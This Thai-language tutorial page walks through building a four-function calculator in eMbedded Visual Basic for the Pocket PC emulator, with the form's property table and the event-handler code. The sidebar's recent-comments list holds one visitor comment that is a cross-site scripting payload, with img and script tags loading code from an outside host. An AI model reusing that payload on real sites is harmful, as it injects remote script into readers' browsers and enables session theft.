หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 eMbedded Visual Basic Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 eMbedded Visual Basic
 
 

บทที่ 6 โปรแกรมเครื่องคิดเลข

 

โปรแกรมเครื่องคิดเลข จะออกแบบให้มีช่องสำหรับกรอกเลข 2 จำนวน และแสดงผลลัพธ์ทางช่องผลลัพธ์ โดยมีปุ่ม บวก, ลบ, คูณ และหาร เพื่อใช้ในการคิดคำนวณ

Downloadดาวน์โหลดโปรแกรม

การออกแบบโปรแกรม

ทำการคลิกและลาก คอลโทรล ออกมาวาง ไว้บน Form ดังรูป

รูปแสดง การวางคอนโทรลบน Form
รูปแสดง การวางคอนโทรลบน Form

ทำการคลิกเลือก คอนโทรล ทีละอัน แล้วทำการกำหนด Property ตามตาราง ดังต่อไปนี้

Control Property Value
Form Name frmMain
  Caption Easy Caculator
TextBox1 Name txtNum1
  Text 0
TextBox2 Name txtNum2
  Text 0
TextBox3 Name txtNum3
  Text 0
Label1 Name lbNum1
  Caption Number :
Label2 Name lbNum2
  Caption Number :
Label3 Name lbNum3
  Caption Result :
CommandButton1 Name cmdOp1
  Caption +
CommandButton2 Name cmdOp2
  Caption -
CommandButton3 Name cmdOp3
  Caption x
CommandButton4 Name cmdOp4
  Caption /

ผลที่ได้คือหน้าตาของ Form ใหม่ดังรูปด้านล่าง

รูปแสดง การวางคอนโทรลบน Form หลังจากกำหนด Property แล้ว
รูปแสดง การวางคอนโทรลบน Form หลังจากกำหนด Property แล้ว

เริ่มต้นใส่โค้ดการทำงาน

ขั้นตอนต่อไป จะเป็นการใส่โค้ดเข้าไปเพื่อให้โปรแกรมที่เราสร้างขึ้น สามารถที่จะทำงานได้ตรงตามวัตถุประสงค์ที่ตั้งไว้ ซึ่งการทำงานของโปรแกรม จะเริ่มจาก ผู้ใช้ทำการป้อน ตัวเลขสองชุด และคลิกแต่ละปุ่ม เพื่อเลือกการคำนวณที่ต้องการ ในการเขียนโค้ด คุณจะสามารถแยกการทำงานต่างๆ ไปตาม sub ของแต่ละการคลิกปุ่ม เช่นคลิกปุ่มบวก ก็ไปเขียนโปรแกรมในส่วนนั้น หรืออาจเขียน sub โปรแกรมกลางไว้ เพื่อให้ทุกปุ่มเรียกใช้ด้วยกัน โดยมีการส่งค่าพารามิเตอร์ ไปด้วย เพื่อให้รู้ว่า เป็นการคลิกปุ่มเพื่อการคำนวณอะไร

ซึ่งจะไม่ค่อยเห็นความแตกต่างสักเท่าไหร่ สำหรับโปรแกรมขนาดเล็ก ดังในโปรเจคตัวอย่าง แต่หากว่าเป็นการเขียนโปรแกรมที่มีการทำงานที่ซับซ้อนกว่านี้ วิธีการสร้าง sub เพื่อใช้งานร่วมกัน เป็นวิธีที่ดีเลยทีเดียว

ให้คุณเปิดหน้าต่าง Code View ขึ้นมา และทำการเลือกที่ตำแหน่ง บรรทัดล่าง ดังรูป

รูปแสดง หน้าต่าง Code View
รูปแสดง หน้าต่าง Code View

จากนั้นทำการป้อนโค้ดดังต่อไปนี้ลงไป เฉพาะส่วนของ Sub Calc() ตามตารางโค้ด ด้านล่าง

Sub Calc(mode As String)
Dim result As Double
Dim num1 As Double
Dim num2 As Double

  num1 = CInt(txtNum1)
  num2 = CInt(txtNum2)
  result = 0
  
  On Error Resume Next

  Select Case mode
    Case "add":
      result = num1 + num2
    Case "sub":
      result = num1 - num2
    Case "mul":
      result = num1 * num2
    Case "div":
      result = num1 / num2
  End Select
  
  txtNum3.Text = result
  
End Sub

อธิบายการทำงาน

การทำงานของ Sub Calc จะเริ่มต้นด้วยการประกาศตัวแปร สำหรับเก็บค่าตัวเลขสองหลัก และผลจากการคำนวณ และนำค่าจาก ช่อง txtNum1 และ txtNum2 มาแปลงเป็นตัวเลข โดยใช้ ฟังก์ชั่น Cint (หรือเรียกง่ายๆว่า Convert to Integer) จากนั้นจะใช้คำสั่ง Select Case เพื่อเลือก การทำงานตามค่าพารามิเตอร์ที่ส่งมาให้กับ Sub Calc ซึ่งค่าต่างๆที่คำนวณ ออกมาได้ จะเก็บไว้ในตัวแปร result และนำแสดงผลที่ได้ ในช่องของ txtNum

จากขั้นตอนที่ผ่านมา ยังเป็นเพียงการสร้าง Sub ขึ้นมา ดังนั้นขั้นตอนต่อมา เราจะทำการเพิ่มโค้ดเข้าไปในส่วนของการ คลิกปุ่มต่างๆ เริ่มต้นการใส่โค้ดในส่วนของการคลิกปุ่มคือ ทำการคลิกเลือกที่ View Object จะมี Form แสดงออกมา และทำการดับเบิ้ลคลิกที่ปุ่ม ทีละปุ่ม แล้วป้อนโค้ดตามตารางด้านล่าง

Private Sub cmdOp1_Click()
 Calc ("add")
End Sub

Private Sub cmdOp2_Click()
 Calc ("sub")
End Sub

Private Sub cmdOp3_Click()
 Calc ("mul")
End Sub

Private Sub cmdOp4_Click()
 Calc ("div")
End Sub

ทดสอบ Run โปรแกรม

การ Run สามารถทำได้โดยทำการคลิกเลือก Emulator ที่ต้องการจะ run เป็น Pocket PC 2002 Emulation

รูปแสดง การเลือก Emulator เพื่อจะ run โปรแกรม
รูปแสดง การเลือก Emulator เพื่อจะ run โปรแกรม

เมื่อทำการเลือกแล้ว คุณสามารถคลิกที่ปุ่ม ลูกศร ที่อยู่บน Toolbar หรือ กดปุ่ม F5 เพื่อทำการ Run โปรแกรม หลังจากนั้นจะมีการเรียก Emulator ขึ้นมา หากมีข้อความยืนยัน ให้การ update ใดๆ ให้คุณเลือก Yes เพื่อยืนยัน ทั้งหมด ผลที่ได้จากการ Run จะเป็นดังหน้าต่าง ที่เราได้ออกแบบไว้ ให้คุณทำการทดสอบการทำงาน โดยป้อนตัวเลข ทั้งสองจำนวน จากนั้น คลิกปุ่ม ที่ต้องการให้คำนวณ จะมีการแสดงผลลัพธ์แสดงออกมา ดังรูปจะเป็นการคลิกปุ่มคูณตัวเลข

รูปแสดง ผลการ Run โปรแกรมบน Emulator
รูปแสดง ผลการ Run โปรแกรมบน Emulator

 

BACK

หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++ Tutorial
Java Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th